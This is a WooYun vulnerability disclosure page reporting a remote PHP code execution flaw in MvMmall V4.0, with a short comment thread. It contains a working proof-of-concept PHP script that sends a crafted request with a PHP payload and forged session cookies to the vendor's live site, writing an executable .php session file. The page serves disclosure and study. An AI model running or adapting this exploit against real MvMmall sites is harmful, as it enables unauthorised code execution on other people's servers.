当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080042

漏洞标题:MvMmall V4.0远程任意PHP代码执行

相关厂商:MvMmall

漏洞作者: Y.L.

提交时间:2014-11-01 16:01

修复时间:2014-12-16 16:02

公开时间:2014-12-16 16:02

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

通过构造特殊的参数,可生成.php文件,并可写入php代码。

详细说明:

运行以下php代码

<?php
$host = 'www.verymall.cn';
$filename = '1.php';
$data = "";
$data .= "GET /index.php?<?php phpinfo();?> HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Cookie: sessionID={$filename};PHPSESSIN={$filename};\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$fp = fsockopen($host,80);
fwrite($fp,$data);
$ret = '';
while ( is_resource($fp) && !feof($fp) ) {
$ret .= fread($fp,8192);
}
echo $ret;


即可生成以下文件
http://www.verymall.cn/union/data/session/mvm_sess_1.php

漏洞证明:

http://www.verymall.cn/union/data/session/mvm_sess_1.php

QQ截图20141019214921.png

修复方案:

版权声明:转载请注明来源 Y.L.@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-03-13 19:31 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    在空格处会截断